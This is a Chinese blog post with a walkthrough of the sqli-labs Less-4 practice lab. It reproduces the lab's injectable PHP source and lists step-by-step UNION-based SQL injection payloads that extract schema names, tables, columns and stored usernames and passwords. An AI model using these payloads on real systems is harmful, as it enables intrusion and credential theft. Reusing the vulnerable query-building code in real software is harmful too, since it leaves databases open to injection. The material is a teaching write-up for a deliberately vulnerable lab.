sqli-labs:less-4(双引号报错注入)

最新推荐文章于 2023-09-03 13:46:19 发布
最新推荐文章于 2023-09-03 13:46:19 发布
阅读量189 收藏 1
点赞数
分类专栏: SQL注入 文章标签: SQL注入 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42702981/article/details/118698071
版权 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-4 Error Based- DoubleQuotes String</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo "<font size='5' color= '#99FF00'>";
  	echo 'Your Login name:'. $row['username'];
  	echo "<br>";
  	echo 'Your Password:' .$row['password'];
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>

</font> </div></br></br></br><center>
<img src="../images/Less-4.jpg" /></center>
</body>
</html>

?id=1
?id=1 and 1=2(没报错,不是数字型)
?id=1' (正常回显了)以前可不是这样的。
?id=1"(这样就报错了,说明是个双引号包裹id)

?id=1" order by 1--+(还是在报错)
 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1-- ") LIMIT 0,1' at line 1
很明显是有个()包裹id
所以:
?id=1") order by 1--+
.....
最后判读出有3列。

?id=-1") union select 1,database(),group_concat(schema_name) from information_schema.schemata--+(查数据库)
?id=-1") union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() --+(查表名)
?id=-1") union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users'--+(查列名)
?id=-1") union select 1,database(),group_concat(id,username,password) from users--+(查数据)

~羽~.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqlilabs(SQL注入)小白通基础通关笔记(专针对小白)(第四关Less-4)
u013630181的博客
07-05 164
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=ut
SQL注入靶场sqli-labs(1-6)
m0_49025459的博客
05-09 737
Less-1(基于错误的GET单引号字符型注入) 我们直接看看源码弄明白什么是单引号字符型注入 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id']))//判断GET获取的id不能为空 { $id=$_GET['id'];//让id=我
sqli-labs:less-11/12 简单SQL注入和身份验证漏洞综合
Zeker62的博客
08-31 214
这两个靶场是一样的题,我就拿less-12说事了吧 首先,尝试胡乱输入密码进行测试: 发现存在报错,这时用admin和admin这个正确的账号密码进行测试(1~10前面的题目告诉了) 发现有着正确的提示: 但是还不够,我们尝试在username后面加上单引号: 发现正常报错 加上双引号尝试(没输入密码) 存在报错,这个就是SQL注入点:You have an error in your SQL ...
《小迪安全》第12天 Web漏洞:SQL注入
m0_56250796的博客
04-12 244
在本系列课程学习中,SQL注入漏洞将是重点部分,SQL注入非常复杂,区分各种数据库类型、提交方法、数据类型等注入,需要按部就班的学习,才能学会相关SQL注入的核心。同样此类漏洞是Web安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。
SQLi-Labs 学习笔记(Less 31-40)
Onlyme的博客
03-11 1202
点击打开链接Less-31①先打开网页查看 Welcome Dhakkan与之前唯一的区别在于:[plain] view plain copy$id = '"' .$id. '"';  $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";  直接构建payload:[plain] view plain copyhttp://localhost/s...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
SQLi LABS Less-4 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-19 1万+
sqli第四关,sqlilabs less-4,sqli-labs less4 判断注入类型
sql-labs SQL注入平台-第4关Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)
最新发布
Onlyone_1314的博客
09-03 240
Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)发现我们输入的id值被括号(“”)包围起来了,这样导致我们输入的值都会被当作括号里的id,且两边被双引号包围。其他的步骤就和第3关类似了。成功使用union联合查询。
payload sql注入_第二章:SQL注入审计
weixin_39632212的博客
12-19 158
0x00 简介为什么第一章我们学注入审计,因为看这篇文章的朋友大概也看过我前面写的MySQL_wiki系列,这里来SQL注入的话我们能方便理解,同时sql注入也是审计中我们经常想要找到的,比较以来就getshell什么的也不现实这种漏洞也不多。0x01 字符型注入这里我们看到sqli-libs第一关的代码php//including the Mysql connect parameter...
SqliLabs Less23-24
qq_45785324的博客
07-16 355
SqliLabs Less23 Less24
sqli-Labs靶场笔记
young‘s blog
11-14 2800
点击打开链接http://blog.csdn.net/u012763794/article/details/51207833http://blog.csdn.net/u012763794/article/details/51361152http://blog.csdn.net/u012763794/artic...
sqli-labs:24,二次注入
weixin_30414155的博客
03-24 325
二次排序注入 二次排序注入也称为存储型注入,就是将可能导致 sql 注入的字符先存入到数据库中,当再次调用这个恶意构造的字符时,就可以出发 sql 注入。 二次排序注入思路: 1. 黑客通过构造数据的形式,在浏览器或者其他软件中提交 HTTP 数据报文请求到服务 端进行处理,提交的数据报文请求中可能包含了黑客构造的 SQL 语句或者命令。 2. 服务端应用程序会将黑客提交的数据信息进行存...
mysql注入单引号被过滤_sqli-labs-master第一关:基于错误的GET单引号字符型注入
weixin_33370255的博客
02-19 354
首先来到第一关:可以看到sql语句出错了。用 and 1 = 1去测试:http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1 = 1 %23 回显正常%23是“#”注释用 and 1 = 2 去测试:http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1 = 2 %23 回显示失败,说明存...
SQL注入攻击】GET-Double Injection-Double Quotes-String(双注入GET双引号字符型注入)
sm1918451478的博客
11-02 211
SQL注入攻击】GET-Double Injection-Double Quotes-String(双注入GET双引号字符型注入)
SQL注入原理-字符型注入
T1ngSh0w的博客
09-13 8066
SQL注入原理-字符型注入
sqli-labs-less
07-25
抱歉,但我无法回答关于sqli-labs-less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs-less-1完整解析,小白干货](https://blog.csdn.net/qq_46432288/article/details/109226871)[target="_blank...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值